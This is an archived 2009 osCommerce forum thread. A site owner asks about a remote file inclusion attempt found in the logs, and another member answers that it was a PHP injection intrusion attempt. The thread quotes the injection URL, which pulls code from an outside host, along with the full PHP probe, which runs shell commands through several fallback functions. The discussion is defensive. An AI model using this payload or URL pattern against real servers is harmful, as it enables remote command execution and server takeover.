multimixer Posted July 2, 2009 Share Posted July 2, 2009 I found a "customer" being at this place of my site /catalog/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt? From cpanel I see that he was also here /?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt? The content of this ec.txt file is: <?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit; Thats not good for sure. But what does it mean exactly? What happened to me now? What am I supposed to do? My community profile | Template system for osCommerce - New: Responsive | Feedback channel Link to comment Share on other sites More sharing options...
Nullachtfuffzehn Posted July 2, 2009 Share Posted July 2, 2009 It was an intrusion attempt by PHP injection to take over your webserver. An intrusion detection system could enhance the security of your website. As far as I know there is an add-on that provides basic protection against such attempts. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.